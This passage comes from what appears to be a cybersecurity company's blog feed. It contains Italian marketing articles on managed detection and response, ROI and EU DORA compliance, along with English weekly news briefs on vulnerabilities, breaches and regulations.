Questo approccio integrato non solo incrementa la capacità di difesa contro attacchi sofisticati, ma facilita anche una gestione della sicurezza informatica più strategica e focalizzata, migliorando significativamente la postura di sicurezza complessiva dell'organizzazione.

Benefici dei servizi MDR

I servizi di Managed Detection & Response rappresentano la risposta alle sfide dei reparti IT che ambiscono ad aumentare la maturità della sicurezza e ridurre i rischi informatici, consentendo alle aziende di:

Migliorare le attività di rilevamento:

l’unione di tecnologia avanza e analisi esperta consente di analizzare in maniera più rapida e approfondita le attività sospette;
Velocizzare le attività di risposta:

la capacità di agire in tempo reale riduce drasticamente i tempi necessari per mitigare gli incidenti.
Adottare un approccio proattivo:

poter contare su informazioni di Threat intelligence di alta qualità consente di anticipare le mosse delle cyber gang;
Alleggerire il carico di lavoro dei team IT interni:

affidando le operazioni di sicurezza al provider MDR, i team interni possono concentrati esclusivamente sulle attività più critiche per la sicurezza;
Minimizzare i falsi positivi:

l’analisi approfondita dei dati di telemetria riduce il numero dei falsi positivi a carico del cliente, ottimizzando le risorse e l'efficienza;

Accesso a Competenze e Tecnologie Avanzate:

assicura una postura di sicurezza sempre aggiornata e preparata per gli attacchi di nuova generazione.

Certego MDR

I servizi di Managed Detection & Response erogati da Certego si articolano intorno a tre pilastri, perfettamente integrati tra loro in modo sinergico: la piattaforma proprietaria PanOptikon®, un team dedicato di Security Operations Services e un'intensa attività di ricerca nell'ambito della Cyber Threat Intelligence.

La stretta interconnessione tra tecnologia avanzata, competenze umane altamente specializzate e analisi approfondita delle minacce, posiziona Certego come player all’avanguardia nei servizi di Managed Detection & Response.

Piattaforma PanOptikon®:

La piattaforma PanOptikon®, sviluppata da Certego, rappresenta il cuore tecnologico del servizio MDR. Concepita come soluzione SaaS, abilita le attività di monitoraggio, analisi e risposta alle minacce informatiche, offrendo una visibilità unificata dei diversi ambienti IT attraverso un'unica soluzione integrata.

La piattaforma si distingue per la sua scalabilità e flessibilità, caratteristiche che permettono di adattarla alle specifiche esigenze di ogni cliente attraverso moduli attivabili su misura. La struttura modulare di PanOptikon® assicura che la piattaforma possa evolvere parallelamente alle crescenti necessità dell'azienda, garantendo un supporto continuo e affidabile nel tempo.

PanOptikon® offre ampie possibilità di personalizzazione, consentendo il tuning ad-hoc delle regole di rilevamento, analisi e risposta. Questa capacità di customizzazione assicura che le strategie di sicurezza possano essere finemente calibrate in base al contesto operativo specifico, migliorando l'efficacia della protezione informatica e rispondendo dinamicamente alle mutevoli minacce del panorama cyber.

Security Operations Services:

I servizi di Security Operations consentono di affidare le operazioni di sicurezza informatica a un team di esperti altamente qualificati. Questi professionisti, tra cui Cyber Security Analyst, Threat Hunter, Threat Researcher, Incident Responder, Forensics Analyst e Service Specialist, possiedono le certificazioni e l'esperienza necessarie per contrapporsi efficacemente alle minacce più sofisticate, assicurando una protezione adattiva 24 ore su 24, 7 giorni su 7.

L'offerta del Security Operations team include anche un supporto completo e proattivo per la gestione e la personalizzazione della piattaforma di sicurezza, ottimizzando la configurazione in funzione delle esigenze specifiche di ogni cliente.

Threat Intelligence:

La Threat Intelligence svolge un ruolo cruciale nei servizi di Managed Detection and Response di Certego, agendo come fulcro per una difesa informatica proattiva ed efficace. La capacità di Certego di arricchire i propri servizi MDR con una Intelligence proprietaria, specificamente orientata al contesto italiano, ma estesa con dati globali e contributi di terze parti, rappresenta un vantaggio competitivo distintivo, potenziando significativamente l'efficacia della lotta contro le minacce informatiche.

Il team di Threat Intelligence di Certego impiega una metodologia approfondita per la raccolta dati, esplorando le zone più remote del Dark Web, forum esclusivi, reti segrete e gruppi privati sui social media. L'obiettivo è catturare le minacce alla loro origine, intercettando informazioni cruciali per la sicurezza. Queste informazioni, una volta elaborate, diventano intelligence operativa, dotando sia gli analisti di Certego che i clienti di informazioni precise, rilevanti e pronte per anticipare le mosse dei cybercriminali.

Scopri di più sui servizi MDR di Certego

Weekly Highlights - March 8th

Thu, 07 Mar 2024 23:00:00 GMT

EU Agrees 'Cyber Solidarity Act' to Bolster Incident Response and Recovery

#European Union

The European Union (EU) has agreed new rules to strengthen cyber incident response and recovery across member states, which has been dubbed the ‘cyber solidarity act.’

The provisional regulation aims to make the EU more resilient and reactive to cyber threats via new cooperation mechanisms.

Capita says cyberattack contributed to annual loss of more than £106 million

#Breaches and Incidents

Capita, the British outsourcing company hit by a ransomware attack last March, has reported losing $135.5 million over the last year — roughly a quarter of which was directly caused by the incident.

A new Linux malware campaign is targeting misconfigured Apache Hadoop, Confluence, Docker, and Redis instances

#Vulnerabilities

The threat actors behind this campaign employed previously undetected payloads, including four Golang binaries that are used to automate the discovery and infection of hosts running the above services.

Lazarus hackers exploited Windows zero-day to gain Kernel privileges

#Vulnerabilities

North Korean threat actors known as the Lazarus Group exploited a flaw in the Windows AppLocker driver a zero-day to gain kernel-level access and turn off security tools, allowing them to bypass noisy BYOVD techniques.

CVE, now tracked as CVE-2024-21338, was reported to Microsoft, which led to the development of a fix for the flaw included in the February 2024 Patch Tuesday update.

From February 24th to March 1st, CERT-AGID has identified and analyzed 16 malicious campaigns within its reference Italian scenario

#Reports

14 campaigns had specifics Italian targets.

Migliorare la sicurezza e massimizzare il ROI

Pier Giorgio Bergonzi, Product Marketing — Thu, 29 Feb 2024 23:00:00 GMT

La recente sofisticazione degli attacchi informatici ha portato ogni organizzazione a fronteggiare sfide senza precedenti per proteggere i propri ambienti IT. I team di sicurezza interni, spesso vincolati da limitazioni di risorse, lottano per gestire un flusso costante di allarmi. Questa sovrabbondanza di segnalazioni mette a dura prova la capacità dei reparti IT aziendali di rilevare e investigare ogni minaccia, evidenziando la necessità di adottare soluzioni e servizi di cybersecurity avanzati, in grado di garantire l’analisi di tutti gli eventi sospetti e offrire una risposta tempestiva ad ogni tentativo di intrusione.

In risposta a questa esigenza, i servizi di Managed Detection and Response (MDR) emergono come soluzione ottimale, mettendo a disposizione delle aziende un team di Detection and Response altamente efficiente, operativo 24 ore su 24, 7 giorni su 7, a un costo decisamente inferiore rispetto alla creazione di un team di cybersecurity in-house. I servizi di MDR assicurano una visibilità completa degli ambienti IT, migliorando notevolmente l'accuratezza dei rilevamenti, la profondità delle analisi e l'efficacia delle azioni di risposta. Fondamentali per estendere le capacità di sicurezza interne, i servizi di MDR arricchiscono inoltre l'organizzazione con informazioni di primo livello di Threat Intelligence, tecnologie avanzate e consigli proattivi per il rafforzamento continuo delle linee di difesa.

Affidarsi ai servizi di MDR significa, quindi, non solo rispondere in maniera efficace e tempestiva alle minacce, ma anche abbracciare una strategia di sicurezza che si adatta dinamicamente all'evoluzione del panorama della cybersecurity. Questo consente alle organizzazioni di superare le limitazioni operative interne, ottimizzando l'allocazione del budget di sicurezza in modo intelligente e mirato.

Ottimizzazione del ROI

L'integrazione dei servizi di Managed Detection and Response (MDR) nelle strategie di cybersecurity aziendali, non solo potenzia i livelli di sicurezza, ma si rivela anche una mossa strategica per massimizzare il ritorno sugli investimenti (ROI), consentendo di gestire la sicurezza informatica in modo più efficace e allineato alle esigenze di budget, offrendo un approccio ottimizzato che coniuga protezione avanzata e gestione oculata delle risorse. Vediamo alcuni esempi:

(I nomi delle aziende e gli esempi citati sono fittizi, ma ispirati a scenari reali nel campo della cybersecurity per illustrare situazioni concrete)

Risparmio sui costi di gestione interna

Creare internamente all’azienda una struttura comparabile a quella offerta da un provider MDR richiede un investimento significativo in competenze specialistiche, tecnologie e infrastrutture, oltre al mantenimento di un'operatività continua, 24 ore su 24, 7 giorni su 7, il cui costo è molto elevato. Affidarsi a servizi di MDR, che integrano rilevamento, analisi, risposta e consigli proattivi per l'aggiornamento continuo dei sistemi di difesa e l'accesso a informazioni strategiche di Threat Intelligence, consente alle aziende di tenere il passo con le sfide della cybersecurity senza sostenere costi elevati.

Esempio:

A fronte di un considerevole aumento degli eventi sospetti di cybersecurity a carico del personale IT, l'azienda TekNova, operante nel settore manifatturiero, si trova di fronte alla decisione di sviluppare internamente un team di sicurezza informatica operativo 24/7 o di affidarsi a un partner che eroga servizi di MDR.

Oltre ai costi del personale interno, una delle sfide più significative nell'organizzare un team dedicato alla sicurezza è la difficoltà di assicurare la copertura continua, compresi i turni notturni e festivi. Trovare professionisti qualificati disposti a lavorare in questi orari richiede non solo un processo di selezione più complesso e prolungato ma anche incentivi economici significativi per compensare la reperibilità e il lavoro in orari non standard. Inoltre, l'impegno economico richiesto per la formazione continua e per il mantenimento delle competenze del personale di sicurezza al passo con le evoluzioni delle minacce informatiche rappresenta un altro onere finanziario considerevole. Questi fattori, sommati all’esigenza di investire in soluzioni tecnologiche avanzate e nella loro manutenzione, si traducono in costi iniziali e operativi elevati. Affidandosi a un servizio di MDR, TekNova può superare queste sfide, assicurandosi un team di esperti sempre disponibile e aggiornato sulle ultime minacce, senza dover gestire direttamente i costi e le complessità legate alla formazione, alla ricerca e alla gestione del personale. Questo approccio consente a TekNova di ottimizzare l'utilizzo delle risorse finanziarie e umane. Allo stesso tempo, l'azienda ottiene livelli di sicurezza maggiori, migliorando l'efficienza operativa e affinando gli investimenti in cybersecurity.

Efficienza e ottimizzazione delle risorse IT

Adottare un servizio di MDR si traduce in un considerevole vantaggio competitivo per le imprese, consentendo un riorientamento delle risorse IT verso iniziative chiave che promuovono crescita e innovazione. Questo slancio strategico consente al team IT di distaccarsi dalle attività quotidiane legate alla cybersecurity, come la gestione e il triage di un volume molto ampio di segnalazioni di sicurezza, che spesso possono rilevarsi falsi positivi. Liberando il personale IT dal fardello di esaminare ogni singolo alert, si apre la possibilità di impiegare le competenze in modo più efficace: investendo nello sviluppo e nell'ottimizzazione di processi tecnologici all'avanguardia che aumentano il valore aziendale e rafforzano la posizione competitiva sul mercato.

Esempio:

FinCorp, un'istituzione nel settore finanziario, è di fronte alla complessa sfida di bilanciare le proprie necessità di cybersecurity con gli obiettivi di innovazione nel mercato dei servizi finanziari digitali. La gestione interna delle attività di monitoraggio e risposta agli incidenti di sicurezza richiede tempo e risorse, che potrebbero essere invece allocate in progetti di sviluppo ad alto potenziale di generazione di ricavi. Per affrontare questa sfida, FinCorp opta per l'adozione di un servizio di MDR. Questa decisione strategica permette al team IT di concentrarsi su iniziative che favoriscono la crescita e l'innovazione, come lo sviluppo di nuove piattaforme di banking digitale.

La decisione di affidarsi a un servizio di MDR non solo incrementa la sicurezza informatica di FinCorp, ma anche i suoi ricavi, facilitando la più rapida introduzione di innovazioni nei servizi finanziari. Tra queste, l'ampliamento della propria offerta di banking digitale e il lancio di nuovi servizi digitali focalizzati sul cliente contribuiscono significativamente a migliorare il posizionamento competitivo, i ricavi e la capacità di innovazione dell'istituzione.

Riduzione del rischio e mitigazione dei costi associati

L'adozione dei servizi di MDR minimizza il rischio di violazioni dei dati e attacchi informatici attraverso rilevazioni e risposte tempestive, evitando così costi potenzialmente molto gravosi legati a perdite finanziarie, sanzioni normative e danni alla reputazione. La capacità di mantenere la continuità operativa e ridurre i tempi di inattività rappresenta un vantaggio finanziario diretto, contribuendo a un ROI tangibile.

Esempio:

  Consapevole dell'impatto economico delle violazioni dei dati, la società "HealthData", specializzata nell’erogazioni di servizi sanitari nel settore privato e gestione dei dati dei pazienti, si trova di fronte a un rischio notevole. Un'analisi approfondita dei costi e dei benefici dimostra che l'adozione di un servizio di MDR può notevolmente abbassare la possibilità di incidenti di sicurezza, riducendo così il rischio di impatti finanziari significativi causati da eventuali violazioni dei dati.

Questa strategia non solo tutela i dati sensibili dei pazienti, ma previene anche costi indiretti, quali danni alla reputazione aziendale e perdita di clientela. Inoltre, implementando un approccio proattivo alla sicurezza, HealthData assicura la propria continuità operativa, aspetto cruciale in ogni settore aziendale.

Flessibilità e scalabilità in linea con il business

I servizi di MDR offrono la flessibilità di scalare le operazioni di sicurezza in base alle mutevoli esigenze aziendali. Questo significa che l'investimento in sicurezza cresce in modo efficiente e proporzionato all'espansione dell'organizzazione, garantendo che le risorse siano sempre ottimizzate rispetto alle necessità attuali e future.

Esempio:

L’azienda "GlobalManufacture", impegnata in un processo di espansione con l'apertura di nuove sedi all'estero, si trova ad affrontare la necessità di rivedere la propria strategia di sicurezza per adeguarla alle richieste di un'azienda in crescita. L'incremento delle sedi internazionali introduce sfide complesse, dalla gestione di un panorama di minacce in continua evoluzione alle esigenze specifiche di ogni nuovo mercato. La flessibilità dei servizi di MDR, che consente di modulare rapidamente e con vantaggi economici i livelli di servizio, offre a "GlobalManufacture" la possibilità di adeguarsi tempestivamente a queste dinamiche.

Questa strategia scalabile assicura che ogni investimento in sicurezza sia calibrato per garantire il massimo impatto, evitando sprechi di risorse o carenze in ambiti critici. In aggiunta, la versatilità fornita dai servizi di MDR sostiene la strategia di espansione globale di "GlobalManufacture", assicurando che le politiche di sicurezza rimangano allineate con gli obiettivi di business e le normative locali in ogni nuova località, minimizzando così i rischi legali e operativi durante il processo di internazionalizzazione dell'azienda.

In sintesi, i servizi di MDR rappresentano un pilastro fondamentale per rafforzare i livelli di cybersecurity e per assicurare il ritorno sugli investimenti in ambito IT, senza la necessità di ingenti investimenti interni. Estendono la capacità di un team di sicurezza di rilevare, analizzare, indagare e rispondere attivamente alle minacce, sfruttando piattaforme tecnologiche avanzate e l'esperienza approfondita in materia di sicurezza. Questi servizi si adattano e crescono in base alle necessità aziendali, offrendo una risposta mirata alle minacce e liberando risorse per iniziative di business strategiche. Fornendo una copertura 24/7, migliorano la postura di sicurezza di un'organizzazione, garantendo sempre difese aggiornate e di primo livello, consentendo alle aziende di navigare il complesso panorama della sicurezza informatica in modo più efficace e meno oneroso.

Certego MDR: la soluzione completa per le nuove sfide di Cybersecurity:

I servizi Certego di Managed Detection & Response vengono erogati attraverso la piattaforma proprietaria o PanOptikon® che abilita le attività di monitoraggio in tempo reale, analisi e risposta degli incidenti, oltre all’interazione diretta tra il team IT del cliente e il Detection & Response team di Certego.

La piattaforma utilizza un approccio modulare per adattarsi all'infrastruttura dell'organizzazione e scalare in base alle nuove necessità.

Scopri come migliorare i tuoi investimenti in cybersecurity con la piattaforma PanOptikon® e i servizi MDR di Certego

Weekly Highlights - February 23th

Thu, 22 Feb 2024 23:00:00 GMT

European Commission presents new initiatives for digital infrastructures of tomorrow

#Regulations

The iniziatives aim to shape the digital landscapes of the future by addressing the challenges posed by rapid technological advancement and increasing reliance on digital platforms.

ECSO publishes the NIS2 Implementation Survey

#Regulations

The survey aims to identify key challenges and priorities in implementing NIS2 and share results with relevant stakeholders.

CVE-2024-21413

#Vulnerabilities

Microsoft Outlook Remote Code Execution Vulnerability.

CVE-2024-21410

#Vulnerabilities

Microsoft Exchange Server Elevation of Privilege Vulnerability.

OCSC 2024

Sun, 18 Feb 2024 23:00:00 GMT

Certego è stata selezionata tra le aziende che parteciperanno in qualità di relatori alla Open Cyber Security Conference di Tenerife, il Forum internazionale organizzato da FIRST, TF-CSIRT e Open CSIRT Foundation per favorire lo scambio di obiettivi, idee e informazioni volte a elevare i livelli di sicurezza informatica.

Martedì 27 febbraio, Matteo Lodi e Simone Berni di Certego presenteranno il talk "IntelOwl - Making the Life of Security Analysts easier", durante il quale verranno esplorati i vantaggi della soluzione di Certego IntelOwl per agevolare il lavoro quotidiano degli analisti di sicurezza informatica, consentendo loro di risparmiare tempo e aumentare l'efficienza delle operazioni di cybersecurity.

Certego è l'unica azienda italiana selezionata per intervenire a questo significativo evento internazionale. Oltre a presentare la soluzione di Threat Intelligence di Certego per per la raccolta e condivisione degli indicatori di compromissione (IOC) di terze parti, la conferenza rappresenta l’opportunità per consolidare la già solida collaborazione con il FIRST, il principale forum internazionale che riunisce i team di risposta agli incidenti di sicurezza informatica (CSIRTs) ed esperti di sicurezza di tutto il mondo.

Weekly Highlights - February 16th

Thu, 15 Feb 2024 23:00:00 GMT

NIST has published a practical guide for monitoring incoming data using the TLS 1.3 protocol

#Researches

The new draft practice guide can help companies in key industries use TLS 1.3 while performing required audits on incoming internet traffic.

Hackers exploit Ivanti SSRF flaw to deploy new DSLog backdoor

#Vulnerabilities

The vulnerability, tracked as CVE-2024-21893, was disclosed as an actively exploited zero-day on January 31, 2024.

Microsoft Confirms Actively Exploited Security Flaw in Exchange Server

#Vulnerabilities

The security bug was exploited as a 0day before being fixed during this month's Patch Tuesday.

German battery manufacturer Varta was forced to shut down its IT systems and stop production as a result of a cyberattack.

#Breaches and Incidents

German news outlet Handelsblatt revealed that company’s share price fell by 4.75% after it announced the incident.

Normativa DORA

Pier Giorgio Bergonzi, Product Marketing — Wed, 14 Feb 2024 23:00:00 GMT

Summary

La Normativa DORA
A chi si applica
I 5 pilastri del regolamento DORA
Certego
Whitepaper

1. La Normativa DORA

Il Digital Operational Resilience Act (DORA) è la normativa dell'Unione Europea progettata per accelerare le capacità di resilienza cibernetica delle istituzioni finanziarie.

L'obiettivo principale del DORA è prevenire e mitigare le minacce informatiche e garantire che le entità finanziarie possano resistere, rispondere e riprendersi da tutti i tipi di interruzioni e minacce legate all'ICT.

Entro il 17 gennaio 2025, gli Stati membri dell'UE saranno tenuti a conformarsi a questa legge, che impone alle organizzazioni dei servizi finanziari di potenziare la loro risposta alle interruzioni operative, concentrando maggiormente l'attenzione sulla resilienza e il recupero rispetto agli approcci tradizionali di individuazione e protezione.

La normativa stabilisce requisiti uniformi per la sicurezza dei sistemi di rete e informazione che sostengono i processi aziendali delle entità finanziarie. Questi requisiti includono la gestione del rischio ICT, la gestione degli incidenti legati all'ICT, la classificazione e la segnalazione, i test di resilienza operativa digitale, la condivisione di informazioni e intelligence sulle minacce informatiche e vulnerabilità, oltre a misure per la gestione del rischio associato ai fornitori di servizi ICT di terze parti.

2. A chi si applica

La portata del Regolamento DORA è estremamente ampia e coinvolge quasi tutti gli operatori del settore finanziario.

Le istituzioni finanziarie interessate, comprese banche, compagnie assicurative, società di investimento, scambi di criptovalute e piattaforme di trading, insieme ad altre organizzazioni che forniscono loro servizi critici, dovranno adeguarsi alla normativa per evitare multe che potrebbero raggiungere fino al 2% del loro fatturato annuo totale. L'importo delle multe dipenderà dalla gravità delle violazioni e dalla cooperazione dell'entità finanziaria con le autorità di regolamentazione.

3. I 5 pilastri del regolamento DORA

Le società finanziarie dell'UE sono tenute a conformarsi ai nuovi requisiti indicati secondo i seguenti cinque pilastri.

1. Gestione del rischio ICT:

Il quadro normativo DORA impone ai vertici aziendali la responsabilità di sovrintendere alla gestione delle tecnologie dell'informazione e della comunicazione (ICT), definendo adeguate strategie di gestione del rischio e garantendone l’effettiva implementazione, nonchè l’aggiornamento.

Le organizzazioni interessate sono tenute a sviluppare un framework di gestione del rischio ICT che assicuri la mappatura dei sistemi informatici, l'identificazione e la classificazione degli asset critici e la documentazione delle interdipendenze tra risorse, sistemi, processi e fornitori.

È imperativo per queste organizzazioni condurre regolari valutazioni dei rischi ICT, segnalare e categorizzare le minacce alla sicurezza informatica e delineare strategie per arginare i rischi identificati. Parte fondamentale di questo processo include l'analisi dell'impatto che specifici scenari di rischio e interruzioni potrebbero avere sulle operazioni aziendali, consentendo di stabilire livelli di rischio bassi e di adeguare di conseguenza l'infrastruttura ICT.

Parallelamente, è richiesto alle aziende di implementare robuste misure di sicurezza informatica, che comprendono protocolli per la gestione delle identità e degli accessi, l'aggiornamento costante dei software e l'integrazione di tecnologie all'avanguardia quali software XDR, sistemi SIEM e soluzioni SOAR.

Altrettanto cruciali sono lo sviluppo e l'attuazione di piani di business continuity e di ripristino post-disastro per affrontare una vasta gamma di rischi informatici, dai guasti tecnici e catastrofi naturali ai cyberattacchi. Questi piani devono includere strategie efficaci di backup e recupero dati, procedure per il ripristino operativo dei sistemi e canali di comunicazione efficaci con clienti, partner commerciali e autorità di regolamentazione.

Come Certego può aiutare:
La piattaforma PanOptikon è progettata come sistema unificato, per fornire un punto di controllo unico e sempre attivo sullo stato di sicurezza dei diversi ambienti IT e attivare procedure di Incident Response 24/7 in caso di eventuali anomalie riscontrate tramite le logiche di detection.

2. Reportistica degli incidenti ICT:

Le entità interessate sono chiamate ad adottare soluzioni in grado di monitorare, gestire, classificare e segnalare gli incidenti informatici. In base alla gravità dell’incidente, alle organizzazioni interessate potrebbe essere richiesto di informare sia le autorità normative che i clienti e i partner coinvolti.

Per gli eventi di maggiore rilevanza, sarà obbligatorio fornire tre tipi di documentazione:

Rapporto iniziale: subito dopo l'identificazione di un incidente significativo, deve essere inviato un rapporto iniziale alle autorità di vigilanza, fornendo dettagli preliminari sull'incidente.

Rapporto intermedio: a seconda dell'evoluzione dell'incidente e delle sue indagini, possono essere richiesti uno o più rapporti intermedi per aggiornare le autorità sulle misure di mitigazione adottate e sul progresso della risoluzione.

Rapporto finale: una volta risolto l'incidente, un rapporto finale deve essere presentato per analizzare le cause, le conseguenze, le misure di mitigazione adottate e le lezioni apprese. Questo rapporto può anche fornire raccomandazioni per prevenire la ricorrenza di incidenti simili.

I requisiti dettagliati di reportistica sotto la normativa DORA possono differire a seconda delle interpretazioni delle autorità nazionali e europee. Le entità devono quindi riferirsi alle regolamentazioni e alle linee guida specifiche vigenti per conformarsi pienamente agli obblighi di reportistica.

Come Certego può aiutare:
La piattaforma PanOptikon consente la gestione end-to-end di un incidente informatico, fornendo informazioni dettagliate e report personalizzati per tutte le fasi dell’incidente, quali rilevamento, analisi, contenimento e risposta.

3. Test di resilienza digitale

Le organizzazioni sono chiamate ad eseguire test periodici sui propri sistemi informatici per verificare l'efficacia delle misure di sicurezza e scoprire eventuali punti deboli. I risultati dei test svolti ed i piani adottati per affrontare eventuali debolezze di cybersecurity dovranno essere comunicati alle autorità competenti e da esse convalidati.

È prevista annualmente l'attuazione di test essenziali, come analisi di vulnerabilità e simulazioni basate su scenari specifici.

Le istituzioni finanziarie ritenute strategiche per il sistema finanziario dovranno inoltre sottoporsi ogni tre anni a test di intrusione che simulino attacchi informatici (TLPT), coinvolgendo anche i loro fornitori di servizi ICT critici.

Il framework richiesto dalla normativa DORA per lo svolgimento di questi test è il TIBER-EU (Threat Intelligence Based Etichal Red-Teaming) elaborato dalla BCE nel 2018 e che Consob, insieme con Banca d’Italia e IVASS, ha contribuito a tradurre in un corrispondente framework a livello nazionale, il TIBER-IT.

Come Certego può aiutare:
La piattaforma PanOptikon è in grado di evidenziare eventuali configurazioni errate e/o lacune nei controlli di sicurezza esistenti e contribuisce ad identificare sistemi operativi e software obsoleti. Inoltre, può essere utilizzata per supportare un programma di test di sicurezza fornendo visibilità sui modelli di traffico.

4. Rischio ICT di terze parti

Il regolamento DORA estende la sua portata non solo alle istituzioni finanziarie ma anche ai fornitori di servizi ICT che operano all'interno del settore finanziario.

Si sottolinea l'importanza per le istituzioni finanziarie di impegnarsi nella gestione dei rischi associati alle collaborazioni con terze parti nel settore ICT, soprattutto quando si tratta di affidare loro compiti critici.

La legislazione prevede che non si possano instaurare rapporti di lavoro con fornitori di servizi ICT che non rispettano determinati standard di sicurezza e qualità, con le autorità vigenti pronte a intervenire in caso di accordi non conformi.

Per quanto riguarda i fornitori di servizi ICT considerati fondamentali, questi saranno sottoposti a un controllo diretto da parte delle autorità di regolamentazione europee. La Commissione Europea è attualmente impegnata a definire i parametri che stabiliscono quali fornitori rientrino in questa categoria. A questi fornitori verrà assegnata un'autorità di vigilanza designata, incaricata di assicurare che aderiscano ai requisiti di DORA e di prevenire accordi con entità che non sono in linea con il regolamento.

Come Certego può aiutare:
La piattaforma PanOptikon può supportare il monitoraggio dei rischi di terze parti rilevando attività sospette o anomale che possono originare da una terza parte compromessa.

5. Condivisione delle informazioni

Il regolamento DORA richiede alle istituzioni finanziarie di implementare meccanismi di apprendimento dagli incidenti ICT, sia interni che esterni, promuovendo la partecipazione a iniziative di condivisione volontaria di informazioni su minacce informatiche. Le informazioni scambiate devono essere tutelate rispettando le normative pertinenti, inclusa la protezione dei dati personali secondo il GDPR.

Come Certego può aiutare:
Attraverso un quadro di visibilità unificata e al monitoraggio continuo dell’infrastruttura IT, la piattaforma PanOptikon consente alle organizzazioni di esportare e condividere dati relative alle minacce, quali ad esempio ransomware e indicatori di compromissione, con altre entità finanziarie fidate. La Threat Intelligence proprietaria di Certego consente inoltre di avere un quadro più approfondito in merito all’analisi delle minacce e delle vulnerabilità.

4. Certego

I servizi gestiti di Managed Detection & Response erogati da Certego si basano su un modello adattivo che, partendo dalle attività di Prevenzione, è in grado di gestire ogni fase di un incidente informatico.

PanOptikon® Cybersecurity Platform

La piattaforma di cybersecurity PanOptikon® è la soluzione SaaS che consente di unificare in’unica soluzione la visibilità dei diversi ambienti IT, semplificare i processi di rilevamento e risposta agli attacchi e migliorare l’interazione tra il Security Operations Team di Certego e il cliente.

Security Operations Team

Il SecOps Team si compone di Analisti, Threat Hunter, Threat Researcher, Incident Responder, Forensics Analyst e Service Specialist per identificare, analizzare e rispondere alle minacce informatiche.

Fornisce supporto tempestivo e raccomandazioni per il contenimento, l'eradicazione, il ripristino e la resilienza 24/7/365.

Threat Intelligence

Un Team dedicato in grado di garantire informazioni in tempo reale sulle potenziali minacce, fornendo un dettaglio sulle motivazioni e le tattiche utilizzate dagli attaccanti. Attraverso l’analisi delle TTP (Tactics, Techniques, Procedures) utilizzate dagli attaccanti, la piattaforma di intelligence sulle minacce di Certego fornisce al cliente dati aggiornati sulle più moderne minacce alla sicurezza informatica.

5. Whitepaper

Scopri come i servizi di Managed Detection & Response di Certego, erogati attraverso la piattaforma PanOptikon ti permettono, di essere conforme ai 5 pilastri normativi del regolamento DORA.

Il Whitepaper mostra un esempio pratico di come i servizi gestiti di cybersecurity erogati da Certego ti permettono di essere conforme agli obblighi di reposrtistica richiesti dalla Normativa DORA, in ogni fase di un attacco.

Allineamento alla Normative UE DORA

Wed, 14 Feb 2024 23:00:00 GMT

Entro il 17 gennaio 2025, gli Stati membri dell'UE saranno tenuti a conformarsi a questa legge, che impone alle organizzazioni dei servizi finanziari di potenziare la loro risposta alle interruzioni operative, concentrando maggiormente l'attenzione sulla resilienza e il recupero rispetto agli approcci tradizionali di individuazione e protezione.

In questo Whitepaper mostriamo un esempio pratico di come i servizi gestiti di Managed Detection $ Response di Certego di Certego ti permettono di essere conforme ai 5 pilastri della Normativa. In più trovi un esempio pratico di come la piataforma PanOptikon di permette di avere reportistica dettagliata di tutte le fasi di un incidente informatico, come richiesto dalla Normativa DORA..

Compila il form per ricevere il Whitepaper e scoprire come prepararsi agli aggiornamenti sulla conformità previsti dalla Normativa DORA.

Weekly Highlights - February 9th

Thu, 08 Feb 2024 23:00:00 GMT

European Commission adopted the first European Cybersecurity Certification Scheme

#Regulations

The European Cybersecurity Certification Scheme on Common Criteria (EUCC) offers a set of rules to ensure trustworthiness in the life cycle of information and communications technology (ICT) products.

Most Linux systems exposed to complete compromise via shim vulnerability

#Vulnerabilities

Tracked as CVE-2023-40547 (CVSS score: 9.8), the vulnerability could be exploited to achieve a Secure Boot bypass.

This week, CERT-AGID has identified and analyzed 22 malicious campaigns in the Italian scenario of its reference

#Reports

21 campaigns had Italian targets and one general campaign that nonetheless affected Italy.

Record-breaking ransomware profits surpassed $1B in 2023

#Reports

Says the new report from blockchain analytics firm Chainalysis.

CISO 2024

Pier Giorgio Bergonzi, Product Marketing — Thu, 01 Feb 2024 23:00:00 GMT

Summary

Introduzione
Adottare un approccio adattivo alla cybersecurity
Upgrade e semplificazione tecnologica
Ottimizzazione delle risorse
Compliance alle normative in materia di sicurezza informatica

Introduzione

La cybersecurity è un elemento cruciale per la stabilità di ogni organizzazione, agendo come baluardo essenziale sia nella protezione contro le interruzioni delle attività operative che nella salvaguardia dell'immagine aziendale. Una solida strategia di cybersecurity non solo previene le perdite economiche dirette dovute agli attacchi informatici, ma contribuisce anche a costruire e mantenere la fiducia dei clienti e dei partner commerciali, rafforzando la reputazione dell'azienda.

Oltre alla progressiva sofisticazione delle tecniche di attacco, anche l'attuale contesto geopolitico, caratterizzato da instabilità e incertezza, sta favorendo l’espansione dei cybercriminali, che ora includono nel loro raggio di attacco anche settori aziendali prima ritenuti meno a rischio. In questo scenario, i CISO e i responsabili IT devono affrontare sfide più complesse e sono chiamati a prendere decisioni cruciali per il futuro delle loro organizzazioni.

Per garantire sistemi di difesa in grado di resistere alle nuove minacce, i responsabili della sicurezza informatica sono chiamati a superare quattro sfide cruciali. Vediamole insieme.

1. Adottare un approccio adattivo alla cybersecurity

Nella costante battaglia contro il cybercrime, l'adattabilità è diventata un elemento cruciale per il successo nella difesa delle organizzazioni. Rispetto agli approcci di sicurezza tradizionali, basati principalmente su meccanismi di blocco e procedure post-evento, la sicurezza adattiva si basa sull'utilizzo della Cyber Threat Intelligence per analizzare in modo esteso i comportamenti dei cybercriminali.

La Cyber Threat Intelligence agisce come un radar costantemente attivo, che attraverso l’analisi su larga scala dei comportamenti degli attori malevoli, consente alle organizzazioni di rimanere costantemente aggiornati sull’evoluzione del panorama delle minacce cibernetiche. Invece di reagire solo dopo un attacco, le aziende possono adottare misure adattive per prevenirlo prima che si concretizzi!

Questo approccio alla cybersecurity non solo offre una visione più profonda delle minacce più innovative, ma permette alle aziende di adattare e migliorare costantemente le proprie strategie di difesa, rendendole più robuste e in grado di affrontare efficacemente i rischi emergenti.

L'approccio adattivo alla cybersecurity si articola in diverse componenti:

Risposta rapida:

Grazie alla comprensione approfondita delle tattiche, delle tecniche e delle procedure (TTP) utilizzate dagli aggressori, le organizzazioni possono accelerare la loro capacità di risposta agli incidenti, riducendo significativamente il danno potenziale e ripristinando rapidamente le operazioni aziendali.

Decisioni basate sui dati:

La Cyber Threat Intelligence fornisce dati contestualizzati e analisi approfondite che aiutano i responsabili della sicurezza a prendere decisioni informate sulla protezione delle risorse critiche e sulla priorità delle risposte agli incidenti.

Personalizzazione della sicurezza:

L’approccio adattivo consente di personalizzare le misure di sicurezza in base al profilo di rischio specifico di un'organizzazione, garantendo un utilizzo efficiente delle risorse per proteggere gli asset più critici.

